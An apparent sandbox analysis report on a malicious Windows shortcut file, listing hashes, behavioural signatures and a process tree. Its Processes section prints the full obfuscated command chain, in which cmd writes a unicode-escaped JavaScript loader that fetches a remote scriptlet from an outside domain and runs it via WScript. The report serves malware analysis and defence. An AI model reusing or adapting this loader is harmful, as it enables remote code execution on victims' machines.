Analysis
-
max time kernel
135s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
30/05/2023, 05:52
Static task
static1
Behavioral task
behavioral1
Sample
CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnk
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnk
Resource
win10v2004-20230220-en
General
-
Target
CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnk
-
Size
1KB
-
MD5
b7403fafb97aa69f0a86293526092727
-
SHA1
4b3c92feebd81f1ad2020347ad8c02875a381e25
-
SHA256
103d4b2be6c41f858cc52802535ea78502f5fab702704fc39e67a2c7d1c565ee
-
SHA512
855d69184902233344de40d9c9115bb9598a7ce6986878f24a25bb59d364354611a78282480b0cc2e4748b2a77e48d153a39247fd49d6e0e17b93b4edab092fe
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 9 3596 WScript.exe 11 3596 WScript.exe 13 3596 WScript.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings cmd.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4528 conhost.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3372 wrote to memory of 4528 3372 cmd.exe 86 PID 3372 wrote to memory of 4528 3372 cmd.exe 86 PID 4528 wrote to memory of 344 4528 conhost.exe 87 PID 4528 wrote to memory of 344 4528 conhost.exe 87 PID 344 wrote to memory of 3596 344 cmd.exe 88 PID 344 wrote to memory of 3596 344 cmd.exe 88
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\CBM_Vistoria82783048885553654586815.699179.38512.lNk.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "md C:\U6aGT85\>nul 2>&1 &&s^eT XYXC=C:\U6aGT85\^U6aGT85.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0054\u0059\u0045\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0054\u0059\u0045\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0054\u0059\u0045\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0054\u0059\u0045\u002b\u0044\u0054\u0059\u0045\u002b\u0045\u0054\u0059\u0045\u002b\u0022\u002f\u002f\u0035\u0076\u0065\u0072\u0031\u0074\u0070\u0065\u006f\u0038\u0074\u002e\u006c\u0069\u0063\u0065\u006e\u0063\u0069\u0061\u006d\u0065\u006e\u0074\u006f\u006d\u0065\u0065\u006e\u0074\u0072\u0065\u0067\u0061\u002e\u0063\u006f\u006d\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!XYXC!&&ca^ll !XYXC!"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /V/D/c "md C:\U6aGT85\>nul 2>&1 &&s^eT XYXC=C:\U6aGT85\^U6aGT85.^Js&&echo eval('\u0076\u0061\u0072\u0020\u0043\u0054\u0059\u0045\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0054\u0059\u0045\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022\u003a\u0068\u0022\u003b\u0045\u0054\u0059\u0045\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043\u0054\u0059\u0045\u002b\u0044\u0054\u0059\u0045\u002b\u0045\u0054\u0059\u0045\u002b\u0022\u002f\u002f\u0035\u0076\u0065\u0072\u0031\u0074\u0070\u0065\u006f\u0038\u0074\u002e\u006c\u0069\u0063\u0065\u006e\u0063\u0069\u0061\u006d\u0065\u006e\u0074\u006f\u006d\u0065\u0065\u006e\u0074\u0072\u0065\u0067\u0061\u002e\u0063\u006f\u006d\u002f\u003f\u0031\u002f\u0022\u0029\u003b'); >!XYXC!&&ca^ll !XYXC!"3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\U6aGT85\U6aGT85.Js"4⤵
- Blocklisted process makes network request
PID:3596
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
744B
MD5ef993e214a66385f94e0a06c3238928b
SHA192d62af02eeff228fba195b9ae44341db339da40
SHA256ec7e5d0ec6234b4d8c46059a3d20e77ae459d9f3fefc56b8fd8f81b2d8b50949
SHA512b9164f55a87d29d4b3c719ac744d255fc7f02d4c1c67da2b4ec7b6dce5b026e48622658850c4c30748997efc8e934095bac95f4f59ca2226f482b77d30a577df
-
Filesize
2KB
MD56b7897eb1f4d8ece7f21299c20627070
SHA1a263ee95b8f500edf2c52824959561b3086aa66d
SHA256774a2766d660cdb256585e1d241e88f36cbb5f481367aaf2c09b17b1bcbbbe5f
SHA5127c88a5670fd7135f31deafbe6cea5cbc00d34ac87a1b12a164036a1758bafb678eca05c4ae8ee88494bde60cfc63916d806d4ab3a0152307481ea68471247358